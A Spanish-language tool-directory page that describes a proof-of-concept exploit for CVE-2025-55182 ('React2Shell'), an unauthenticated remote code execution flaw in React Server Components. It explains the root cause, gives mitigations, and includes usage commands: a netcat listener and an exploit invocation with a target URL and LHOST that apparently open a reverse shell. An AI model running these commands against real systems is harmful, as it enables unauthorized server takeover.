Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-55182-React2Shell-RCE — Exploit de prueba de concepto para CVE-2025-55182 (React2Shell), una vulnerabilidad de ejecución remota de código no autenticada en React Server Components mediante payloads del protocolo Flight especialmente diseñados. | Kitploit
Herramientas/GitHubGitHub/herick-costa/cve-2025-55182-react2shell-rce
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebCTFPruebas de PenetraciónAprendizaje y EducaciónHerramienta de Acceso Remoto
GitHub
herick-costa/cve-2025-55182-react2shell-rce

CVE-2025-55182-React2Shell-RCE

Exploit de prueba de concepto para CVE-2025-55182 (React2Shell), una vulnerabilidad de ejecución remota de código no autenticada en React Server Components mediante payloads del protocolo Flight especialmente diseñados.

Ver Repositorio
13hace 2 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE CVSS RCE Status

CVE-2025-55182 - React2Shell (RCE no autenticado en React Server Components)

CVE-2025-55182, también conocida como React2Shell, es una vulnerabilidad crítica de Ejecución Remota de Código (RCE) no autenticada que afecta a los paquetes de React Server Components (versiones 19.0, 19.1.0, 19.1.1 y 19.2.0).

Esta vulnerabilidad puede permitir a los atacantes lograr la ejecución de código arbitrario en servidores vulnerables mediante una única petición HTTP manipulada, sin requerir autenticación.


Resumen

React Server Components utilizan el protocolo Flight para serializar y deserializar los datos de componentes intercambiados entre el cliente y el servidor.

Una validación inadecuada durante este proceso de deserialización puede permitir que payloads especialmente manipulados alteren estructuras internas de objetos y alcancen primitivas peligrosas de ejecución de JavaScript.


Causa raíz

La vulnerabilidad se origina por una validación insuficiente durante la deserialización de payloads del protocolo Flight de React Server Components (RSC).

Los payloads especialmente manipulados pueden:

  • alterar estructuras internas de objetos
  • recorrer la cadena de prototipos de JavaScript
  • acceder a constructores peligrosos de JavaScript
  • lograr la ejecución de código arbitrario en el servidor

Cómo funciona

  1. El exploit envía una petición multipart/form-data especialmente manipulada
  2. El servidor interpreta la petición como un payload Flight de React
  3. El fragmento malicioso se procesa durante la deserialización
  4. El payload:
  • manipula el flujo de ejecución interno
  • alcanza primitivas peligrosas de ejecución de JavaScript
  • ejecuta código arbitrario
  1. El atacante obtiene ejecución remota de código en el servidor objetivo

🚀 Uso

Inicia un listener en tu máquina:

root@kitploit:~
nc -lvnp 4444

Ejecuta el exploit:

root@kitploit:~
python3 CVE-2025-55182-React2Shell.py <TARGET_URL> <LHOST>
python3 CVE-2025-55182-React2Shell.py http://192.168.56.101:3000/ 192.168.56.100

Requisitos

  • Versiones vulnerables de React / Next.js
  • React Server Components habilitados en el servidor
  • Endpoint RSC accesible

Mitigación

Para mitigar esta vulnerabilidad:

  • Actualiza React a la versión parcheada más reciente disponible
  • Aplica los parches del framework disponibles
  • Supervisa y bloquea peticiones RSC sospechosas

Referencias

- OffSec – Análisis de explotación de CVE-2025-55182

- Microsoft Security – Defensa contra React2Shell

- Aviso de seguridad de React (divulgación oficial)


Aviso legal

Este proyecto se proporciona estrictamente para:

  • Investigación de seguridad
  • Fines educativos
  • Evaluaciones de seguridad autorizadas y pruebas de penetración

Los autores no asumen ninguna responsabilidad por el mal uso o los daños causados por este material. Los usuarios son los únicos responsables de cumplir con todas las leyes y regulaciones aplicables.

Descargar herramienta